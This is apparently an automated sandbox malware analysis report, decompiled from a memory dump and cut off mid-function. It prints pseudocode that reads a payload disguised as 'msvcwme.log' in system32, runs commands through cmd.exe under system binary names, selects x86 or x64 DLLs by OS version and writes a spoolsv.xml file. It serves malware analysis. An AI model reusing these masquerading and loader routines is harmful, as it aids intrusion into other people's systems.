				CloseHandle(_t46);
				_t89 = E02FB0A6E(_t115, _t127, 0x214);
				_t120 = _t119 + 4;
				_v102432 = _t89;
				 *_t89 = 0x2fccac0;
				E02FA8E80();
				_t111 = 0;
				_t117 =  *((intOrPtr*)( *_t89 + 0xc))(_t115, 0x921e);
				if(_t117 != 0) {
					L5:
					E02FB3440(_t111,  &_v102420, 0, 0x19000);
					_v102472 = 0x2fccab8;
					_v102460 = 0;
					_v102468 = 0;
					_v102464 = 0;
					InitializeCriticalSection( &_v102456);
					_v8 = 0;
					_t112 = E02FB0A6E(_t117, _t130, 0x21c);
					_v102428 = _t112;
					 *_t112 = _t117;
					_t17 = _t112 + 4; // 0x4
					 *(_t112 + 0x214) = 0;
					 *((char*)(_t112 + 0x218)) = 0;
					E02FB3440(_t112, _t17, 0, 0x10c);
					_t20 = _t112 + 0x110; // 0x110
					E02FB5C70(_t20, 0x104, "C:\\Windows\\system32\\msvcwme.log");
					_t122 = _t120 + 0x28;
					_t60 =  *((intOrPtr*)( *_t117 + 0x24))();
					if(_t60 == 0xffffffff) {
						L12:
						 *((intOrPtr*)( *_t117 + 0x18))();
						E02FB0AA1(_t112);
						 *((intOrPtr*)( *_t89))(1, 0x21c);
						 *((intOrPtr*)( *_t117))(1);
						_push(1);
						E02FB0AA1(_v102424);
						_t69 = _v102468;
						_v102472 = 0x2fccab8;
						if(_t69 != 0) {
							VirtualFree(_t69, 0, 0x8000);
						}
						DeleteCriticalSection( &_v102456);
						goto L15;
					}
					_t113 = Sleep;
					_t90 = _v102428;
					do {
						if(_t60 <= 0) {
							goto L10;
						}
						E02FB3440(_t113,  &_v102420, 0, 0x19000);
						_t122 = _t122 + 0xc;
						_push(0x19000);
						_push( &_v102420);
						if( *((intOrPtr*)( *_t117 + 0x14))() <= 0) {
							break;
						}
						E02FA8BB0(_t90, _t90, _t113,  &_v102472,  &_v102420, _t76);
						L10:
						Sleep(0xa);
						_t60 =  *((intOrPtr*)( *_t117 + 0x24))();
					} while (_t60 != 0xffffffff);
					_t89 = _v102432;
					_t112 = _v102428;
					goto L12;
				} else {
					goto L3;
				}
				while(1) {
					L3:
					_t104 = _t111;
					_t111 = _t111 + 1;
					if(_t104 >= 5) {
						break;
					}
					Sleep(0xbb8);
					_t117 =  *((intOrPtr*)( *_t89 + 0xc))(_v102424, 0x921e);
					_t130 = _t117;
					if(_t117 == 0) {
						continue;
					}
					goto L5;
				}
				E02FB0AA1(_v102424);
				 *((intOrPtr*)( *_t89))(1, 1);
				__eflags = _t117;
				if(_t117 != 0) {
					 *((intOrPtr*)( *_t117))(1);
				}
				goto L15;
			}


































                                                0x02fa7983
                                                0x02fa7985
                                                0x02fa7990
                                                0x02fa7996
                                                0x02fa799b
                                                0x02fa79a0
                                                0x02fa79a2
                                                0x02fa79a8
                                                0x02fa79ac
                                                0x02fa79b2
                                                0x02fa79b5
                                                0x02fa79bd
                                                0x02fa7bd7
                                                0x02fa7bdc
                                                0x02fa7be5
                                                0x02fa7bf4
                                                0x02fa7bf4
                                                0x02fa79d7
                                                0x02fa79dd
                                                0x02fa79e0
                                                0x00000000
                                                0x00000000
                                                0x02fa79e7
                                                0x02fa79f7
                                                0x02fa79f9
                                                0x02fa79fc
                                                0x02fa7a02
                                                0x02fa7a08
                                                0x02fa7a17
                                                0x02fa7a1c
                                                0x02fa7a20
                                                0x02fa7a51
                                                0x02fa7a5f
                                                0x02fa7a67
                                                0x02fa7a77
                                                0x02fa7a81
                                                0x02fa7a8b
                                                0x02fa7a96
                                                0x02fa7aa1
                                                0x02fa7aad
                                                0x02fa7ab6
                                                0x02fa7abc
                                                0x02fa7abe
                                                0x02fa7ac1
                                                0x02fa7acc
                                                0x02fa7ad3
                                                0x02fa7add
                                                0x02fa7ae9
                                                0x02fa7af0
                                                0x02fa7af5
                                                0x02fa7afb
                                                0x02fa7b73
                                                0x02fa7b77
                                                0x02fa7b80
                                                0x02fa7b8e
                                                0x02fa7b96
                                                0x02fa7b98
                                                0x02fa7ba0
                                                0x02fa7ba5
                                                0x02fa7bae
                                                0x02fa7bba
                                                0x02fa7bc4
                                                0x02fa7bc4
                                                0x02fa7bd1
                                                0x00000000
                                                0x02fa7bd1
                                                0x02fa7afd
                                                0x02fa7b03
                                                0x02fa7b10
                                                0x02fa7b12
                                                0x00000000
                                                0x00000000
                                                0x02fa7b22
                                                0x02fa7b2f
                                                0x02fa7b32
                                                0x02fa7b37
                                                0x02fa7b3f
                                                0x00000000
                                                0x00000000
                                                0x02fa7b52
                                                0x02fa7b57
                                                0x02fa7b59
                                                0x02fa7b5f
                                                0x02fa7b62
                                                0x02fa7b67
                                                0x02fa7b6d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fa7a22
                                                0x02fa7a22
                                                0x02fa7a22
                                                0x02fa7a24
                                                0x02fa7a28
                                                0x00000000
                                                0x00000000
                                                0x02fa7a33
                                                0x02fa7a4b
                                                0x02fa7a4d
                                                0x02fa7a4f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fa7a4f
                                                0x02fa7bff
                                                0x02fa7c0d
                                                0x02fa7c0f
                                                0x02fa7c11
                                                0x02fa7c19
                                                0x02fa7c19
                                                0x00000000

                                                APIs
                                                • CreateFileA.KERNEL32(C:\Windows\system32\msvcwme.log,80000000,00000001,00000000,00000003,00000000,00000000,93AD1EEA,?,?,?,?,02FC463B,000000FF), ref: 02FA79D7
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,02FC463B,000000FF), ref: 02FA79E7
                                                • new.LIBCMT ref: 02FA79F2
                                                  • Part of subcall function 02FA8E80: WSAStartup.WS2_32(00000202,93AD1EEA), ref: 02FA8EA3
                                                • Sleep.KERNEL32(00000BB8), ref: 02FA7A33
                                                • InitializeCriticalSection.KERNEL32(?), ref: 02FA7A96
                                                • new.LIBCMT ref: 02FA7AA8
                                                • Sleep.KERNEL32(0000000A,?,?,?,?,00000000,0000010C,0000021C), ref: 02FA7B59
                                                • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,?,?,?,00000000,0000010C,0000021C), ref: 02FA7BC4
                                                • DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,0000010C,0000021C), ref: 02FA7BD1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: CriticalSectionSleep$CloseCreateDeleteFileFreeHandleInitializeStartupVirtual
                                                • String ID: C:\Windows\system32\msvcwme.log
                                                • API String ID: 1876426310-2357825738
                                                • Opcode ID: 73a8f51a151c4a6d78aeff83f978d6175265fcbf2dbc1b05f45f4175f1cfb409
                                                • Instruction ID: 70d013631c4e77dcd07a4059eb4b3a0e5dbdb152aa867111850c3710c12e28dc
                                                • Opcode Fuzzy Hash: 73a8f51a151c4a6d78aeff83f978d6175265fcbf2dbc1b05f45f4175f1cfb409
                                                • Instruction Fuzzy Hash: ED7165B0B40218AFDB21DF54CD65FDDB7B5AF48B90F1005A9E709AB2D0CB709A448F91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FA7720 Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 185sleepsynchronizationthreadCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 86%
                                                			E02FA7720(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _v8;
				char _v268;
				char _v528;
				char _v788;
				char _v1048;
				char _v1308;
				char _v1568;
				signed int _t26;
				signed int _t56;
				signed int _t65;
				void* _t77;
				void* _t99;
				void** _t101;
				void* _t102;
				void* _t103;
				void* _t104;
				signed int _t105;
				void* _t106;
				void* _t109;
				void* _t110;
				void* _t111;
				void* _t112;

				_t100 = __esi;
				_t26 =  *0x2fcf008; // 0x93ad1eea
				_v8 = _t26 ^ _t105;
				_t99 = __edx;
				_t77 = __ecx;
				E02FB3440(__edx,  &_v1048, 0, 0x104);
				GetSystemDirectoryA( &_v1048, 0x104);
				E02FB3440(_t99,  &_v268, 0, 0x104);
				E02FB3440(_t99,  &_v788, 0, 0x104);
				E02FB3440(_t99,  &_v1308, 0, 0x104);
				E02FB3440(_t99,  &_v1568, 0, 0x104);
				E02FB3440(_t99,  &_v528, 0, 0x104);
				E02FA5180( &_v268, 0x104, "%s\\process1.txt", _t99);
				E02FA5180( &_v788, 0x104, "%s\\process2.txt", _t99);
				_push( &_v268);
				E02FA5180( &_v1308, 0x104, "/c %s\\svchost.exe > %s", _t99);
				_push( &_v788);
				E02FA5180( &_v1568, 0x104, "/c %s\\spoolsv.exe > %s", _t99);
				E02FA5180( &_v528, 0x104, "%s\\cmd.exe",  &_v1048);
				_t109 = _t106 + 0xa0;
				if(E02FA71E0(_t99, _t99) != 0) {
					_t56 = E02FA72D0(_t77, _t99, _t77, _t99, "WIN72K8R2");
					_t110 = _t109 + 4;
					__eflags = _t56;
					if(__eflags == 0) {
						goto L1;
					} else {
						_push(__esi);
						while(1) {
							_t101 = E02FA4F50( &_v528,  &_v1308, __eflags, _t99);
							_t111 = _t110 + 4;
							__eflags = _t101;
							if(_t101 == 0) {
								break;
							}
							WaitForSingleObject( *_t101, 0x2bf20);
							_push(0x10);
							E02FB0AA1(_t101);
							_t112 = _t111 + 8;
							_t65 = E02FA75E0( &_v268);
							__eflags = _t65;
							if(_t65 != 0) {
								__eflags = _t65 == 1;
								if(_t65 == 1) {
									break;
								} else {
									__eflags = E02FA73E0(_t77,  &_v268, _t99, _t99, _t101, _t77);
									if(__eflags == 0) {
										break;
									} else {
										__eflags = E02FA4FD0( &_v1568, __eflags, _t99);
										if(__eflags == 0) {
											break;
										} else {
											_t103 = E02FB0AB4(_t101, __eflags);
											E02FB3440(_t99, _t103, 0, 0x80);
											E02FB5C70(_t103, 0x80, _t77);
											CreateThread(0, 0, E02FA7980, _t103, 0, 0);
											Sleep(0x32);
											_t104 = 0x80;
											__eflags = _v8 ^ _t105;
											return E02FB0A5D(_v8 ^ _t105, _t104);
										}
									}
								}
							} else {
								E02FA72D0(_t77, _t99, _t77, _t99, "XP");
								_t110 = _t112 + 4;
								continue;
							}
							goto L12;
						}
						_pop(_t102);
						__eflags = _v8 ^ _t105;
						return E02FB0A5D(_v8 ^ _t105, _t102);
					}
				} else {
					L1:
					return E02FB0A5D(_v8 ^ _t105, _t100);
				}
				L12:
			}

























                                                0x02fa7720
                                                0x02fa7729
                                                0x02fa7730
                                                0x02fa7740
                                                0x02fa7745
                                                0x02fa7747
                                                0x02fa775b
                                                0x02fa776f
                                                0x02fa7782
                                                0x02fa7795
                                                0x02fa77a8
                                                0x02fa77bb
                                                0x02fa77d2
                                                0x02fa77ec
                                                0x02fa77f7
                                                0x02fa780a
                                                0x02fa7815
                                                0x02fa7828
                                                0x02fa7845
                                                0x02fa784a
                                                0x02fa7856
                                                0x02fa7873
                                                0x02fa7878
                                                0x02fa787b
                                                0x02fa787d
                                                0x00000000
                                                0x02fa787f
                                                0x02fa787f
                                                0x02fa7880
                                                0x02fa7892
                                                0x02fa7894
                                                0x02fa7897
                                                0x02fa7899
                                                0x00000000
                                                0x00000000
                                                0x02fa78a6
                                                0x02fa78ac
                                                0x02fa78af
                                                0x02fa78b4
                                                0x02fa78c2
                                                0x02fa78c2
                                                0x02fa78c5
                                                0x02fa78da
                                                0x02fa78dd
                                                0x00000000
                                                0x02fa78e3
                                                0x02fa78f4
                                                0x02fa78f6
                                                0x00000000
                                                0x02fa78f8
                                                0x02fa790d
                                                0x02fa790f
                                                0x00000000
                                                0x02fa7911
                                                0x02fa7920
                                                0x02fa7925
                                                0x02fa7931
                                                0x02fa7947
                                                0x02fa794f
                                                0x02fa7955
                                                0x02fa795d
                                                0x02fa7967
                                                0x02fa7967
                                                0x02fa790f
                                                0x02fa78f6
                                                0x02fa78c7
                                                0x02fa78d0
                                                0x02fa78d5
                                                0x00000000
                                                0x02fa78d5
                                                0x00000000
                                                0x02fa78c5
                                                0x02fa796d
                                                0x02fa796f
                                                0x02fa797a
                                                0x02fa797a
                                                0x02fa7859
                                                0x02fa7859
                                                0x02fa7869
                                                0x02fa7869
                                                0x00000000

                                                APIs
                                                • GetSystemDirectoryA.KERNEL32 ref: 02FA775B
                                                • WaitForSingleObject.KERNEL32(00000000,0002BF20,00000000), ref: 02FA78A6
                                                • CreateThread.KERNEL32(00000000,00000000,02FA7980,00000000,00000000,00000000), ref: 02FA7947
                                                • Sleep.KERNEL32(00000032), ref: 02FA794F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: CreateDirectoryObjectSingleSleepSystemThreadWait
                                                • String ID: %s\cmd.exe$%s\process1.txt$%s\process2.txt$/c %s\spoolsv.exe > %s$/c %s\svchost.exe > %s$WIN72K8R2
                                                • API String ID: 3526521245-665225228
                                                • Opcode ID: 0a7bd09a7c078635a8732d542c1b3df70e1781c29d914418c849593647254f5f
                                                • Instruction ID: a4b568a50ddcc6de90aae67c6667238afdeec3c0cae5e9ce89604db1806a86c0
                                                • Opcode Fuzzy Hash: 0a7bd09a7c078635a8732d542c1b3df70e1781c29d914418c849593647254f5f
                                                • Instruction Fuzzy Hash: A9511BF1E8020C77EB20F6609C55FEEB36DAF45B94F5000A5F749A7180DAB0AA858F51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FA73E0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 158COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 74%
                                                			E02FA73E0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				char _v268;
				char _v528;
				char _v788;
				void _v103188;
				long _v103192;
				void* _v103196;
				signed int _t29;
				void* _t43;
				char* _t44;
				intOrPtr _t51;
				int _t58;
				void* _t69;
				void* _t76;
				intOrPtr _t88;
				void* _t89;
				void* _t95;
				intOrPtr* _t96;
				long _t97;
				void* _t98;
				void* _t99;
				void* _t100;
				signed int _t101;

				E02FC3CA0();
				_t29 =  *0x2fcf008; // 0x93ad1eea
				_v8 = _t29 ^ _t101;
				_t88 = _a4;
				_t69 = __edx;
				_v103196 = 0;
				_v103192 = 0;
				if(E02FA4E60(__ecx,  &_v103196,  &_v103192) != 0) {
					_push(__esi);
					E02FB3440(_t88,  &_v528, 0, 0x104);
					E02FB3440(_t88,  &_v268, 0, 0x104);
					E02FA5180( &_v528, 0x104, "%s\\x86.dll", _t69);
					E02FA5180( &_v268, 0x104, "%s\\x64.dll", _t69);
					E02FB3440(_t88,  &_v103188, 0, 0x19000);
					_t95 = _v103196;
					_t43 = E02FA76A0(_t95);
					if(_t43 == 0x20) {
						_t44 =  &_v528;
						goto L9;
					} else {
						if(_t43 == 0x40) {
							_t44 =  &_v268;
							L9:
							_push(_t44);
							E02FA5180( &_v103188, 0x19000,  *0x2fd6834, _t88);
							if(_t95 != 0) {
								LocalFree(_t95);
							}
							E02FB3440(_t88,  &_v788, 0, 0x104);
							E02FA5180( &_v788, 0x104, "%s\\spoolsv.xml", _t69);
							_t96 =  &_v103188;
							_t76 = _t96 + 1;
							do {
								_t51 =  *_t96;
								_t96 = _t96 + 1;
							} while (_t51 != 0);
							_v103192 = 0;
							_t97 = _t96 - _t76;
							_t89 = CreateFileA( &_v788, 0x40000000, 2, 0, 2, 0x80, 0);
							if(_t89 == 0) {
								goto L6;
							} else {
								_t58 = WriteFile(_t89,  &_v103188, _t97,  &_v103192, 0);
								_push(_t89);
								if(_t58 != 0) {
									CloseHandle();
									_pop(_t99);
									return E02FB0A5D(_v8 ^ _t101, _t99);
								} else {
									CloseHandle();
									_pop(_t100);
									return E02FB0A5D(_v8 ^ _t101, _t100);
								}
							}
						} else {
							if(_t95 != 0) {
								LocalFree(_t95);
							}
							L6:
							_pop(_t98);
							return E02FB0A5D(_v8 ^ _t101, _t98);
						}
					}
				} else {
					return E02FB0A5D(_v8 ^ _t101, __esi);
				}
			}


























                                                0x02fa73e8
                                                0x02fa73ed
                                                0x02fa73f4
                                                0x02fa73f9
                                                0x02fa7402
                                                0x02fa7404
                                                0x02fa7415
                                                0x02fa7429
                                                0x02fa743b
                                                0x02fa744a
                                                0x02fa745d
                                                0x02fa7474
                                                0x02fa748b
                                                0x02fa749e
                                                0x02fa74a3
                                                0x02fa74ae
                                                0x02fa74b6
                                                0x02fa74e3
                                                0x00000000
                                                0x02fa74b8
                                                0x02fa74bb
                                                0x02fa74db
                                                0x02fa74e9
                                                0x02fa74e9
                                                0x02fa74fd
                                                0x02fa7507
                                                0x02fa750a
                                                0x02fa750a
                                                0x02fa751e
                                                0x02fa7535
                                                0x02fa753a
                                                0x02fa7543
                                                0x02fa7546
                                                0x02fa7546
                                                0x02fa7548
                                                0x02fa7549
                                                0x02fa7565
                                                0x02fa7570
                                                0x02fa7578
                                                0x02fa757c
                                                0x00000000
                                                0x02fa7582
                                                0x02fa7594
                                                0x02fa759a
                                                0x02fa759d
                                                0x02fa75b8
                                                0x02fa75c3
                                                0x02fa75d0
                                                0x02fa759f
                                                0x02fa759f
                                                0x02fa75a5
                                                0x02fa75b7
                                                0x02fa75b7
                                                0x02fa759d
                                                0x02fa74bd
                                                0x02fa74bf
                                                0x02fa74c2
                                                0x02fa74c2
                                                0x02fa74c8
                                                0x02fa74c8
                                                0x02fa74da
                                                0x02fa74da
                                                0x02fa74bb
                                                0x02fa742b
                                                0x02fa743a
                                                0x02fa743a

                                                APIs
                                                  • Part of subcall function 02FA4E60: CreateFileA.KERNEL32(C:\Windows\system32\msvcwme.log,80000000,00000001,00000000,00000003,00000080,00000000,?,73B76490), ref: 02FA4E81
                                                  • Part of subcall function 02FA4E60: GetFileSizeEx.KERNEL32(00000000,00000000,?,73B76490), ref: 02FA4EA1
                                                  • Part of subcall function 02FA4E60: LocalAlloc.KERNEL32(00000040,00000001,?,73B76490), ref: 02FA4EB3
                                                  • Part of subcall function 02FA4E60: CloseHandle.KERNEL32(00000000,?,73B76490), ref: 02FA4ECF
                                                • LocalFree.KERNEL32(?), ref: 02FA74C2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: FileLocal$AllocCloseCreateFreeHandleSize
                                                • String ID: %s\spoolsv.xml$%s\x64.dll$%s\x86.dll
                                                • API String ID: 1503672127-2651032631
                                                • Opcode ID: 548e500ebf55fb037fb3b625f4cd0ae0e3a0ec9d48eb94c60e16d4915c4890bf
                                                • Instruction ID: 697b214bc505b8e91457f4e9eefa15664ddeaa6ce0419a5b4ccbd4b6a2191c76
                                                • Opcode Fuzzy Hash: 548e500ebf55fb037fb3b625f4cd0ae0e3a0ec9d48eb94c60e16d4915c4890bf
                                                • Instruction Fuzzy Hash: 8751E8B1E4021CABDB20EB50DD55FEEF36DAF05794F5004E5EA19A7180DB70A7848FA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FA4E60 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 94filememoryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 71%
                                                			E02FA4E60(CHAR* __ecx, void** __edx, struct _OVERLAPPED** _a4) {
				void** _v12;
				long _v16;
				long _v20;
				struct _OVERLAPPED* _v28;
				struct _OVERLAPPED* _v32;
				void* __edi;
				struct _OVERLAPPED* _t19;
				void** _t22;
				long _t29;
				void* _t31;
				long _t33;
				void** _t36;
				struct _OVERLAPPED** _t37;
				long _t40;

				_t36 = __edx;
				_v12 = __edx;
				_t31 = CreateFileA(__ecx, 0x80000000, 1, 0, 3, 0x80, 0);
				if(_t31 == 0xffffffff) {
					L3:
					return 0;
				} else {
					_v32 = 0;
					_v28 = 0;
					__imp__GetFileSizeEx(_t31,  &_v32);
					_t19 = _v32;
					_v20 = _t19;
					_t7 =  &(_t19->Internal); // 0x1
					_t39 = _t7;
					 *_t36 = LocalAlloc(0x40, _t7);
					E02FB3440(_t36, _t20, 0, _t39);
					_t22 = _t36;
					if( *_t22 != 0) {
						_t37 = _a4;
						_t33 = _v20;
						_t40 = _t33;
						 *_t37 = 0;
						if(_t33 > 0) {
							while(1) {
								_v16 = 0;
								ReadFile(_t31,  *_t22, _t40,  &_v16, 0);
								_t29 = _v16;
								if(_t29 == 0) {
									break;
								}
								 *_t37 =  *_t37 + _t29;
								_t40 = _t40 - _t29;
								_t22 = _v12;
								if(_t40 > 0) {
									continue;
								}
								break;
							}
							_t33 = _v20;
						}
						_push(_t31);
						if( *_t37 == _t33) {
							CloseHandle();
							return 1;
						} else {
							CloseHandle();
							LocalFree( *_v12);
							return 0;
						}
					} else {
						CloseHandle(_t31);
						goto L3;
					}
				}
			}

















                                                0x02fa4e7b
                                                0x02fa4e7e
                                                0x02fa4e87
                                                0x02fa4e8c
                                                0x02fa4ed5
                                                0x02fa4edd
                                                0x02fa4e8e
                                                0x02fa4e91
                                                0x02fa4e9a
                                                0x02fa4ea1
                                                0x02fa4ea7
                                                0x02fa4eaa
                                                0x02fa4ead
                                                0x02fa4ead
                                                0x02fa4ebd
                                                0x02fa4ebf
                                                0x02fa4ec4
                                                0x02fa4ecc
                                                0x02fa4ede
                                                0x02fa4ee1
                                                0x02fa4ee4
                                                0x02fa4ee6
                                                0x02fa4eee
                                                0x02fa4ef0
                                                0x02fa4ef5
                                                0x02fa4f01
                                                0x02fa4f07
                                                0x02fa4f0c
                                                0x00000000
                                                0x00000000
                                                0x02fa4f0e
                                                0x02fa4f10
                                                0x02fa4f12
                                                0x02fa4f17
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fa4f17
                                                0x02fa4f19
                                                0x02fa4f19
                                                0x02fa4f1c
                                                0x02fa4f1f
                                                0x02fa4f3b
                                                0x02fa4f49
                                                0x02fa4f21
                                                0x02fa4f21
                                                0x02fa4f2c
                                                0x02fa4f3a
                                                0x02fa4f3a
                                                0x02fa4ece
                                                0x02fa4ecf
                                                0x00000000
                                                0x02fa4ecf
                                                0x02fa4ecc

                                                APIs
                                                • CreateFileA.KERNEL32(C:\Windows\system32\msvcwme.log,80000000,00000001,00000000,00000003,00000080,00000000,?,73B76490), ref: 02FA4E81
                                                • GetFileSizeEx.KERNEL32(00000000,00000000,?,73B76490), ref: 02FA4EA1
                                                • LocalAlloc.KERNEL32(00000040,00000001,?,73B76490), ref: 02FA4EB3
                                                • CloseHandle.KERNEL32(00000000,?,73B76490), ref: 02FA4ECF
                                                • ReadFile.KERNEL32(00000000,?,00000000,?,00000000,?,73B76490), ref: 02FA4F01
                                                • CloseHandle.KERNEL32(00000000,?,73B76490), ref: 02FA4F21
                                                • LocalFree.KERNEL32(?,?,73B76490), ref: 02FA4F2C
                                                • CloseHandle.KERNEL32(00000000,?,73B76490), ref: 02FA4F3B
                                                Strings
                                                • C:\Windows\system32\msvcwme.log, xrefs: 02FA4E7D
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: CloseFileHandle$Local$AllocCreateFreeReadSize
                                                • String ID: C:\Windows\system32\msvcwme.log
                                                • API String ID: 47662278-2357825738
                                                • Opcode ID: dbda322258f9945b6656bfea665b5a682980d1d504d9f821dd5f9678db71e311
                                                • Instruction ID: 75fbf0544eaaa063f8d4bdecebdda9507bab8b3330b25f8ad77089541e4decfc
                                                • Opcode Fuzzy Hash: dbda322258f9945b6656bfea665b5a682980d1d504d9f821dd5f9678db71e311
                                                • Instruction Fuzzy Hash: A031A7B5E40219AFEB108FA9DC49BAFBBB8EF48361F100155FA05A7380D7B06410CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FC1A09 Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 83%
                                                			E02FC1A09(void* __ebx, void* __edi, int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, short* _a20, char* _a24, int _a28, int _a32) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				short* _v32;
				int _v36;
				char* _v40;
				int _v44;
				intOrPtr _v48;
				void* _v60;
				void* __esi;
				signed int _t63;
				int _t70;
				signed int _t72;
				short* _t73;
				signed int _t77;
				short* _t87;
				void* _t89;
				void* _t92;
				int _t99;
				short _t101;
				intOrPtr _t102;
				signed int _t112;
				char* _t114;
				char* _t115;
				void* _t120;
				void* _t121;
				intOrPtr _t122;
				intOrPtr _t123;
				intOrPtr* _t125;
				short* _t126;
				short* _t127;
				signed int _t128;
				short* _t129;

				_t63 =  *0x2fcf008; // 0x93ad1eea
				_v8 = _t63 ^ _t128;
				_t127 = _a20;
				_v44 = _a4;
				_v48 = _a8;
				_t67 = _a24;
				_v40 = _a24;
				_t125 = _a16;
				_v36 = _t125;
				if(_t127 <= 0) {
					if(_t127 >= 0xffffffff) {
						goto L2;
					} else {
						goto L5;
					}
				} else {
					_t127 = E02FC002B(_t125, _t127);
					_t67 = _v40;
					L2:
					_t99 = _a28;
					if(_t99 <= 0) {
						if(_t99 < 0xffffffff) {
							goto L5;
						} else {
							goto L7;
						}
					} else {
						_t99 = E02FC002B(_t67, _t99);
						L7:
						_t70 = _a32;
						if(_t70 == 0) {
							_t70 =  *( *_v44 + 8);
							_a32 = _t70;
						}
						if(_t127 == 0 || _t99 == 0) {
							if(_t127 != _t99) {
								if(_t99 <= 1) {
									if(_t127 <= 1) {
										if(GetCPInfo(_t70,  &_v28) == 0) {
											goto L5;
										} else {
											if(_t127 <= 0) {
												if(_t99 <= 0) {
													goto L36;
												} else {
													_t89 = 2;
													if(_v28 >= _t89) {
														_t114 =  &_v22;
														if(_v22 != 0) {
															_t127 = _v40;
															while(1) {
																_t122 =  *((intOrPtr*)(_t114 + 1));
																if(_t122 == 0) {
																	goto L15;
																}
																_t101 =  *_t127;
																if(_t101 <  *_t114 || _t101 > _t122) {
																	_t114 = _t114 + _t89;
																	if( *_t114 != 0) {
																		continue;
																	} else {
																		goto L15;
																	}
																}
																goto L63;
															}
														}
													}
													goto L15;
												}
											} else {
												_t92 = 2;
												if(_v28 >= _t92) {
													_t115 =  &_v22;
													if(_v22 != 0) {
														while(1) {
															_t123 =  *((intOrPtr*)(_t115 + 1));
															if(_t123 == 0) {
																goto L17;
															}
															_t102 =  *_t125;
															if(_t102 <  *_t115 || _t102 > _t123) {
																_t115 = _t115 + _t92;
																if( *_t115 != 0) {
																	continue;
																} else {
																	goto L17;
																}
															}
															goto L63;
														}
													}
												}
												goto L17;
											}
										}
									} else {
										L17:
										_push(3);
										goto L13;
									}
								} else {
									L15:
								}
							} else {
								_push(2);
								L13:
							}
						} else {
							L36:
							_t126 = 0;
							_t72 = MultiByteToWideChar(_a32, 9, _v36, _t127, 0, 0);
							_v44 = _t72;
							if(_t72 == 0) {
								L5:
							} else {
								_t120 = _t72 + _t72;
								asm("sbb eax, eax");
								if((_t120 + 0x00000008 & _t72) == 0) {
									_t73 = 0;
									_v32 = 0;
									goto L45;
								} else {
									asm("sbb eax, eax");
									_t85 = _t72 & _t120 + 0x00000008;
									_t112 = _t120 + 8;
									if((_t72 & _t120 + 0x00000008) > 0x400) {
										asm("sbb eax, eax");
										_t87 = E02FB7882(_t112, _t85 & _t112);
										_v32 = _t87;
										if(_t87 == 0) {
											goto L61;
										} else {
											 *_t87 = 0xdddd;
											goto L43;
										}
									} else {
										asm("sbb eax, eax");
										E02FC3C70();
										_t87 = _t129;
										_v32 = _t87;
										if(_t87 == 0) {
											L61:
											_t100 = _v32;
										} else {
											 *_t87 = 0xcccc;
											L43:
											_t73 =  &(_t87[4]);
											_v32 = _t73;
											L45:
											if(_t73 == 0) {
												goto L61;
											} else {
												_t127 = _a32;
												if(MultiByteToWideChar(_t127, 1, _v36, _t127, _t73, _v44) == 0) {
													goto L61;
												} else {
													_t77 = MultiByteToWideChar(_t127, 9, _v40, _t99, _t126, _t126);
													_v36 = _t77;
													if(_t77 == 0) {
														goto L61;
													} else {
														_t121 = _t77 + _t77;
														_t108 = _t121 + 8;
														asm("sbb eax, eax");
														if((_t121 + 0x00000008 & _t77) == 0) {
															_t127 = _t126;
															goto L56;
														} else {
															asm("sbb eax, eax");
															_t81 = _t77 & _t121 + 0x00000008;
															_t108 = _t121 + 8;
															if((_t77 & _t121 + 0x00000008) > 0x400) {
																asm("sbb eax, eax");
																_t127 = E02FB7882(_t108, _t81 & _t108);
																_pop(_t108);
																if(_t127 == 0) {
																	goto L59;
																} else {
																	 *_t127 = 0xdddd;
																	goto L54;
																}
															} else {
																asm("sbb eax, eax");
																E02FC3C70();
																_t127 = _t129;
																if(_t127 == 0) {
																	L59:
																	_t100 = _v32;
																} else {
																	 *_t127 = 0xcccc;
																	L54:
																	_t127 =  &(_t127[4]);
																	L56:
																	if(_t127 == 0 || MultiByteToWideChar(_a32, 1, _v40, _t99, _t127, _v36) == 0) {
																		goto L59;
																	} else {
																		_t100 = _v32;
